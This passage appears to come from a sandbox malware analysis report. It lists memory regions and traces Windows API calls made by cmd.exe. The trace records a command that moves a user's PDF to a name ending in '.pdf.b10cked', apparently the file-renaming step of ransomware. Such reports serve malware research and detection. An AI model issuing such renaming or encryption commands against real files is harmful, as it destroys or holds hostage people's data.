"\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15509 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15510 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15511 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15512 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 15513 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15514 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15515 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15516 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 15517 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 15518 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15519 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 15520 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 15521 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 228 os_tid = 0xf70 [0140.085] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfcec | out: lpSystemTimeAsFileTime=0x1cfcec*(dwLowDateTime=0x8d6ef1c0, dwHighDateTime=0x1d440a9)) [0140.085] GetCurrentProcessId () returned 0x638 [0140.085] GetCurrentThreadId () returned 0xf70 [0140.085] GetTickCount () returned 0x2c023 [0140.085] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfce4 | out: lpPerformanceCount=0x1cfce4*=19687452346) returned 1 [0140.086] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.086] __set_app_type (_Type=0x1) [0140.086] __p__fmode () returned 0x76b331f4 [0140.086] __p__commode () returned 0x76b331fc [0140.086] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.086] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.086] GetCurrentThreadId () returned 0xf70 [0140.086] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf70) returned 0x38 [0140.086] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.086] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.086] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.087] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.087] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc7c | out: phkResult=0x1cfc7c*=0x0) returned 0x2 [0140.087] VirtualQuery (in: lpAddress=0x1cfcb3, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.087] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.087] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.087] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.087] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc4c, dwLength=0x1c | out: lpBuffer=0x1cfc4c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0140.087] GetConsoleOutputCP () returned 0x1b5 [0140.087] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.087] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.087] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.087] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.087] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.088] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.088] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.088] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.088] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.088] GetEnvironmentStringsW () returned 0x2101d8* [0140.088] FreeEnvironmentStringsW (penv=0x2101d8) returned 1 [0140.088] GetEnvironmentStringsW () returned 0x2101d8* [0140.088] FreeEnvironmentStringsW (penv=0x2101d8) returned 1 [0140.088] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebec | out: phkResult=0x1cebec*=0x40) returned 0x0 [0140.088] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x0, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x1, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x1, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x0, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x40, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x40, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x40, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegCloseKey (hKey=0x40) returned 0x0 [0140.089] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebec | out: phkResult=0x1cebec*=0x40) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x40, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x1, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x1, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x0, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x9, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x4, lpData=0x1cebf8*=0x9, lpcbData=0x1cebf0*=0x4) returned 0x0 [0140.089] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebf4, lpData=0x1cebf8, lpcbData=0x1cebf0*=0x1000 | out: lpType=0x1cebf4*=0x0, lpData=0x1cebf8*=0x9, lpcbData=0x1cebf0*=0x1000) returned 0x2 [0140.089] RegCloseKey (hKey=0x40) returned 0x0 [0140.089] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.089] srand (_Seed=0x5b88636e) [0140.089] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"" [0140.089] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"" [0140.090] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.090] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x211938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.090] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.090] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.090] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.090] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.090] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.090] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.090] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.090] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.090] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.090] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.090] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.090] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.090] GetEnvironmentStringsW () returned 0x212328* [0140.090] FreeEnvironmentStringsW (penv=0x212328) returned 1 [0140.090] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.090] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.090] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.090] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.091] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.091] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.091] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.091] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.091] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.091] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.091] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf9b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.091] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf9b8, lpFilePart=0x1cf9b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf9b4*="Desktop") returned 0x18 [0140.091] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.091] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf734 | out: lpFindFileData=0x1cf734) returned 0x210068 [0140.091] FindClose (in: hFindFile=0x210068 | out: hFindFile=0x210068) returned 1 [0140.091] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf734 | out: lpFindFileData=0x1cf734) returned 0x210068 [0140.091] FindClose (in: hFindFile=0x210068 | out: hFindFile=0x210068) returned 1 [0140.091] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf734 | out: lpFindFileData=0x1cf734) returned 0x210068 [0140.091] FindClose (in: hFindFile=0x210068 | out: hFindFile=0x210068) returned 1 [0140.091] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.092] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.092] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.092] GetEnvironmentStringsW () returned 0x212b48* [0140.092] FreeEnvironmentStringsW (penv=0x212b48) returned 1 [0140.092] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.092] GetConsoleOutputCP () returned 0x1b5 [0140.092] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.092] GetUserDefaultLCID () returned 0x409 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfaf8, cchData=128 | out: lpLCData="0") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfaf8, cchData=128 | out: lpLCData="0") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfaf8, cchData=128 | out: lpLCData="1") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.093] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.093] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.094] GetConsoleTitleW (in: lpConsoleTitle=0x200918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.095] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.095] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.095] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.095] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.096] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.096] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.096] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.096] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.096] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.096] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.096] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.100] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.101] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0140.101] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0140.101] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0140.101] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0140.101] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="CD") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0140.101] _wcsicmp (_String1="move", _String2="REN") returned -5 [0140.101] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0140.101] _wcsicmp (_String1="move", _String2="SET") returned -6 [0140.101] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0140.101] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0140.101] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0140.101] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0140.101] _wcsicmp (_String1="move", _String2="MD") returned 11 [0140.101] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0140.101] _wcsicmp (_String1="move", _String2="RD") returned -5 [0140.101] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0140.101] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0140.101] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0140.101] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0140.101] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0140.101] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0140.101] _wcsicmp (_String1="move", _String2="VER") returned -9 [0140.101] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0140.101] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0140.101] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0140.101] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0140.101] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0140.102] _wcsicmp (_String1="move", _String2="START") returned -6 [0140.102] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0140.102] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0140.102] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0140.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.103] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.103] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf5ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf5a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf5a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0140.105] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0140.105] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0140.105] _wcsicmp (_String1="THCV85~1.PDF", _String2=".") returned 70 [0140.105] _wcsicmp (_String1="THCV85~1.PDF", _String2="..") returned 70 [0140.106] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85~1.pdf")) returned 0x20 [0140.106] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x211ed0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.106] SetErrorMode (uMode=0x0) returned 0x0 [0140.106] SetErrorMode (uMode=0x1) returned 0x0 [0140.106] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", nBufferLength=0x104, lpBuffer=0x1cef34, lpFilePart=0x1cef1c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF", lpFilePart=0x1cef1c*="THCV85~1.PDF") returned 0x36 [0140.106] SetErrorMode (uMode=0x0) returned 0x1 [0140.106] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x12 [0140.106] _wcsicmp (_String1="THCV85~1.PDF", _String2=".") returned 70 [0140.106] _wcsicmp (_String1="THCV85~1.PDF", _String2="..") returned 70 [0140.106] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\thcv85~1.pdf")) returned 0x20 [0140.106] SetErrorMode (uMode=0x0) returned 0x0 [0140.106] SetErrorMode (uMode=0x1) returned 